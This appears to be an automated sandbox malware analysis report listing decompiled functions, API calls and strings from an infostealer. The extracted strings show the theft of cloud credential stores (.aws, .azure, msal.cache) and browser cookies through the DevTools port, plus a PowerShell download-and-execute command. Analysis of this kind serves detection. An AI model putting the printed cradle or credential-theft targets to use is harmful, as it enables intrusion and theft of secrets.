                                • lstrcat.KERNEL32(?,00000000), ref: 009CE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 009CE886
                                • memset.MSVCRT ref: 009CE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009CE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE920
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009CE947
                                • memset.MSVCRT ref: 009CE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 2b6b5d7276697787da7dcd70629fc2bb02fa7ff3f5c89c091ea231c99de5fbba
                                • Instruction ID: b346fadba450e5d56c1879ec3798fa93d312518b7c824dd28edf597d19d893a1
                                • Opcode Fuzzy Hash: 2b6b5d7276697787da7dcd70629fc2bb02fa7ff3f5c89c091ea231c99de5fbba
                                • Instruction Fuzzy Hash: 9171FC71E40259ABDB21EBA4DD46FED7378EF88700F400898B71AAB1C1DF709E488B55
                                Function 009CABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 009CABCF
                                • lstrlen.KERNEL32(010CEA68), ref: 009CABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CACB7
                                • lstrlen.KERNEL32(009E4AD4), ref: 009CACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CACF3
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009CACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD28
                                • lstrlen.KERNEL32(009E4AD4), ref: 009CAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD5C
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009CAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD91
                                • lstrlen.KERNEL32(010CEA98), ref: 009CADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAE6F
                                • lstrlen.KERNEL32(00000000), ref: 009CAE85
                                • lstrcpy.KERNEL32(00000000,010CEAC8), ref: 009CAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 20d9cfdd869fc4331d266b37f18397c0e1cbeb9764253d9f28cc48eddda895f9
                                • Instruction ID: f8a9e2b738de81a28da44bfbbc34dd080b989a877565069b2a35e984ae1245aa
                                • Opcode Fuzzy Hash: 20d9cfdd869fc4331d266b37f18397c0e1cbeb9764253d9f28cc48eddda895f9
                                • Instruction Fuzzy Hash: 05B18F3091151A9BCB22EFA4DE88BAFB7B9EF80315F044528B815E7291DF34DD05CB92
                                Function 009D47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,009C72A4), ref: 009D47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 009D47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 009D480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 009D481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 009D482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 009D4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 009D4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 009D4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 009D4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 009D4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 009D4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 18c4f5b5de22682c8faa475c9339ad63a78d097e733c3dbbd9c7e28093ec4ab6
                                • Instruction ID: 1e32a0028f845f74ce04376ed96134ea0a65cba3676b00b5dd7ed9a067052eab
                                • Opcode Fuzzy Hash: 18c4f5b5de22682c8faa475c9339ad63a78d097e733c3dbbd9c7e28093ec4ab6
                                • Instruction Fuzzy Hash: EC118EB1856BE0BFC311DFB6AC8DA563AB8BE4970D345081AF044DF161DEF48904CB90
                                Function 009CBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CBE53
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 009CBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 009CBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CBEEB
                                • lstrlen.KERNEL32(')"), ref: 009CBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 009CBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 009CBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 009CBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 009CC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: ebf020fb15ff917fbaf140c5d669d372465f6f394a900e05783daa445165dc41
                                • Instruction ID: 9b67eafb8e2f528960d26d7b3f4df7ce6e9cd8a1f512fc0e47b7c76703106f47
                                • Opcode Fuzzy Hash: ebf020fb15ff917fbaf140c5d669d372465f6f394a900e05783daa445165dc41
                                • Instruction Fuzzy Hash: 36618171E102569BCB21AFB59E8ABEE7BADEF84710F04442DF509E7241DB34C9058B92
                                Function 009D1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D184F
                                • lstrlen.KERNEL32(010B7060), ref: 009D1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D18C1
                                • lstrlen.KERNEL32(009E4FA0), ref: 009D18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D18F4
                                • lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D192F
                                • lstrlen.KERNEL32(010B6FB0), ref: 009D1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D19A6
                                • lstrlen.KERNEL32(009E4FA0), ref: 009D19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D19D9
                                • lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A14
                                • lstrlen.KERNEL32(010B6FE0), ref: 009D1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A8B
                                • lstrlen.KERNEL32(010B6FC0), ref: 009D1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 5ab09540af48aaa287cc63555f8b4f20f774e85a9eefaf62a8fb34c012191e86
                                • Instruction ID: 92f0dfeb403ccee24e3f0fe62cf3b5f8b3f6f72d6a80dd9c7ac05ae8dc370c2f
                                • Opcode Fuzzy Hash: 5ab09540af48aaa287cc63555f8b4f20f774e85a9eefaf62a8fb34c012191e86
                                • Instruction Fuzzy Hash: 63916DB2641743ABDB20EFB5DE88A56B7ECEF44310B14882AA886D7351DF34E845CB50
                                Function 009C4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009C47C5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4812
                                • lstrlen.KERNEL32(009E4B60), ref: 009C481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C483A
                                • lstrcat.KERNEL32(00000000,009E4B60), ref: 009C4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 009C48DC
                                • lstrlen.KERNEL32(?), ref: 009C48F0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 0c5974019042d12f68fe18988ad2773118f1135e6fd69db14d043c41b774854d
                                • Instruction ID: a2139c567053e03b34e04ddd8cfab8250daa03961d6b6468024e07d687c6267c
                                • Opcode Fuzzy Hash: 0c5974019042d12f68fe18988ad2773118f1135e6fd69db14d043c41b774854d
                                • Instruction Fuzzy Hash: 4BB1A271E112469BDB21EFB8DA95BDE77B9EF84310F054428F846AB351DB30EC058B91
                                Function 009B92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009B90C0: InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B90DF
                                  • Part of subcall function 009B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009B90FC
                                  • Part of subcall function 009B90C0: InternetCloseHandle.WININET(00000000), ref: 009B9109
                                • strlen.MSVCRT ref: 009B92E1
                                • strlen.MSVCRT ref: 009B92FA
                                  • Part of subcall function 009B8980: std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                • strlen.MSVCRT ref: 009B9399
                                • strlen.MSVCRT ref: 009B93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 009B9547
                                • lstrcat.KERNEL32(?,009E1794), ref: 009B9559
                                • lstrcat.KERNEL32(?,?), ref: 009B956A
                                • lstrcat.KERNEL32(?,009E4B98), ref: 009B957C
                                • lstrcat.KERNEL32(?,?), ref: 009B958D
                                • lstrcat.KERNEL32(?,.txt), ref: 009B959F
                                • lstrlen.KERNEL32(?), ref: 009B95B6
                                • lstrlen.KERNEL32(?), ref: 009B95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 71416f23d3be3ee3617be407e1872ed2f74f3d278ab15d434cd2c991e6c94b56
                                • Instruction ID: 937297c0ef31f211921374d22d73ed3d7a6098f89a9c4daac61645c993613950
                                • Opcode Fuzzy Hash: 71416f23d3be3ee3617be407e1872ed2f74f3d278ab15d434cd2c991e6c94b56
                                • Instruction Fuzzy Hash: 68E12671E10259DBDF10DFA8DA84BDEBBB5BF88310F1044A9E609A7281DB709E45CF90
                                Function 009CD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 009CD9A1
                                • memset.MSVCRT ref: 009CD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 009CDA1C
                                • lstrcat.KERNEL32(?,010CED38), ref: 009CDA36
                                • lstrcat.KERNEL32(?,?), ref: 009CDA4A
                                • lstrcat.KERNEL32(?,010CD1A8), ref: 009CDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CDA95
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
